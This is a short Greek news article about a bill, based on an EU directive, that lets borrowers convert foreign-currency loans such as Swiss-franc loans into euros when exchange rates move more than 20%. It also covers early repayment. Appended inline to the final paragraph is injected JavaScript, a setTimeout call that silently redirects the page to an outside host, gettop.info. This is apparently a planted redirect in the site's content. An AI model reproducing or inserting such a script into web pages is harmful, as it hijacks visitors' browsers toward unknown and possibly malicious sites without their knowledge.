Προστασία δανειοληπτών από δάνεια σε ξένο νόμισμα

0
7

 

Τη δυνατότητα να μετατρέψει το δάνειό του από ξένο στο δικό του νόμισμα (πχ. από ελβετικό φράγκο σε ευρώ) δίνει κοινοτική οδηγία που ενσωματώνεται με καθυστέρηση στην εθνική νομοθεσία.

Όπως προβλέπει η εν λόγω οδηγία, η αλλαγή νομίσματος θα μπορεί να γίνει όταν η διακύμανση της συναλλαγματικής ισοτιμίας υπερβαίνει το 20%.

Σύμφωνα με την Καθημερινή, ο δανειολήπτης, θα μπορεί βάσει του νομοσχεδίου, να μετατρέψει το δάνειο που έχει πάρει στο δικό του εθνικό νόμισμα όταν η διακύμανση της συναλλαγματικής ισοτιμίας υπερβαίνει το 20%.

Επιπλέον, η τράπεζα υποχρεούται από την πλευρά της να ενημερώσει τον δανειολήπτη για την υπέρβαση του μέγιστου ορίου διακύμανσης της συναλλαγματικής ισοτιμίας.

Το νομοσχέδιο προβλέπει, μεταξύ άλλων, ότι ο δανειολήπτης μπορεί να αποπληρώσει πρόωρα την οφειλή του και να τύχει μείωσης του συνολικού κόστους της πίστωσης σε ό,τι αφορά τόκους και επιβαρύνσεις. Αν όμως έχει συμφωνηθεί σταθερό επιτόκιο, ο πιστωτικός φορέας δικαιούται αποζημίωση που θα υπολογίζεται βάσει μαθηματικού τύπου που θα περιλαμβάνει το νομοσχέδιο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here